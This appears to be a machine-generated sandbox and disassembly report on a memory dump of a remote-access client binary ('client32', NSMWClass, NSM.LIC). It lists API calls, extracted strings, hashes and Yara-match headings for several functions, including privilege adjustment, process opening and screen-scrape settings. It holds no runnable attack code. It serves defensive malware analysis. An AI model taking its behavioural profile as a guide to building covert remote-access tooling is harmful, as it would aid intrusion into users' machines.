                                                                                    • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                    • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                    • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                    • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: Client32$NSMWClass$NSMWClass
                                                                                    • API String ID: 3192549508-611217420
                                                                                    • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                    • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                    • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                    • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                    APIs
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                    • EqualSid.ADVAPI32(?,00A1ECC8,?,00000001,00000001), ref: 1109E9A3
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InformationToken$AllocateEqualInitialize
                                                                                    • String ID:
                                                                                    • API String ID: 1878589025-0
                                                                                    • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                    • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                    • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                    • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,420B7E12,00080000,00000000,00000000), ref: 1109D46D
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                    • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                    • String ID:
                                                                                    • API String ID: 2349140579-0
                                                                                    • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                    • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                    • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                    • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                    • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                    • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                    • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                    • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                      • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                      • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                      • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                      • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                      • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                    • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                    • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                      • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                      • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                      • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                    • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                    • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                    • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                    • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                    • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                    • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                      • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                      • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                      • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                      • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                    • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                    • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                    • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                    • SetWindowPos.USER32(00030462,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                    • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                    • wsprintfA.USER32 ref: 1102FFA5
                                                                                    • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                      • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,420B7E12,00000002,74DF2EE0), ref: 1112820A
                                                                                      • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                      • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                    • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$364339$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                    • API String ID: 1099283604-953618440
                                                                                    • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                    • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                    • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                    • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _malloc_memsetwsprintf
                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$364339$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                    • API String ID: 3802068140-1186720100
                                                                                    • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                    • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                    • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                    • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51

                                                                                    Control-flow Graph: rendered graph not captured in extraction; basic blocks span 110a9c90-110a9f52 and the API calls on its paths are listed under APIs below.
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(setupapi.dll,420B7E12,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                    • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                    • _free.LIBCMT ref: 110A9D60
                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                    • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                    • _malloc.LIBCMT ref: 110A9DB3
                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                    • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                    • GetLastError.KERNEL32 ref: 110A9E21
                                                                                    • _free.LIBCMT ref: 110A9E33
                                                                                    • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                    • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                    • _free.LIBCMT ref: 110A9E64
                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                    • API String ID: 3464732724-3340099623
                                                                                    • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                    • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                    • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                    • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

                                                                                    Control-flow Graph: rendered graph not captured in extraction; basic blocks span 11133920-11133c9f and the API calls on its paths are listed under APIs below.
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,420B7E12), ref: 1113398E
                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                    • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                    • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                    • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                    • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                    • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                    • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                    • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                    • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                    • API String ID: 263027137-1001504656
                                                                                    • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                    • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                    • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                    • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

                                                                                    Control-flow Graph: rendered graph not captured in extraction; basic blocks span 1102dbc0-1102e438 and the API calls on its paths are listed under APIs below.
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
